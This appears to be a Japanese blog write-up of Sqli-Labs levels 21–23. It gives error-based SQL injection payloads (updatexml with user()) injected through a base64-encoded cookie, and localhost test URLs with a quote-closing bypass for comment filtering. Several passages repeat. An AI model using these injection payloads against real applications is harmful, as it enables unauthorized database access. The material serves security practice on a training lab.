Sqli-Lab | Less 21-23
1394 ワード
sqliターゲットフィールドはずっとやる暇がなくて、冬休みの间にそれをして、同时にSQL注入を固めます
Less-21
Less-21
Less-21 Cookie Injection- Error Based- complex - string
クッキー注入-エラーベース-複雑-文字列
テスト
登録されたuname
の値が暗号化され、=
で終わると、まずbase 64が意外にもbase 64がburpを暗号化してパケットをキャプチャしていることを思い出し、cookie
のuname
を変更して暗号化すればpayloadadmin') and updatexml(1,concat(0x7e,(select user()),0x7e),1#
ソースコード
cookie
を設定し、base 64暗号化を使用してcookie
のuname
を呼び出し、base 64を暗号化します.sql文は直接クエリーを行い、エラーと結果を返します.
Less-22
Less-22 Cookie Injection- Error Based- Double Quotes - string
クッキー注入-エラーベース-二重引用符-文字列payloadadmin" and updatexml(1,concat(0x7e,(select user()),0x7e),1#
Less-23
Error Based- strip comments
エラーベース-フィルタあり
テスト
http://127.0.0.1/sqli/Less-23/?id=1'
http://127.0.0.1/sqli/Less-23/?id=1'#
http://127.0.0.1/sqli/Less-23/?id=1'%23
http://127.0.0.1/sqli/Less-23/?id=1'--+
'
が増えました.注釈をフィルタリングしたはずです.それは引用符で閉じます.http://127.0.0.1/sqli/Less-23/?id=1' or 1='1
payload: 1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) or 1='1
ソースコード
コメントの置換
admin') and updatexml(1,concat(0x7e,(select user()),0x7e),1#
Less-22 Cookie Injection- Error Based- Double Quotes - string
クッキー注入-エラーベース-二重引用符-文字列payload
admin" and updatexml(1,concat(0x7e,(select user()),0x7e),1#
Less-23
Error Based- strip comments
エラーベース-フィルタあり
テスト
http://127.0.0.1/sqli/Less-23/?id=1'
http://127.0.0.1/sqli/Less-23/?id=1'#
http://127.0.0.1/sqli/Less-23/?id=1'%23
http://127.0.0.1/sqli/Less-23/?id=1'--+
'
が増えました.注釈をフィルタリングしたはずです.それは引用符で閉じます.http://127.0.0.1/sqli/Less-23/?id=1' or 1='1
payload: 1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) or 1='1
ソースコード
コメントの置換
http://127.0.0.1/sqli/Less-23/?id=1'
http://127.0.0.1/sqli/Less-23/?id=1'#
http://127.0.0.1/sqli/Less-23/?id=1'%23
http://127.0.0.1/sqli/Less-23/?id=1'--+
http://127.0.0.1/sqli/Less-23/?id=1' or 1='1
1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) or 1='1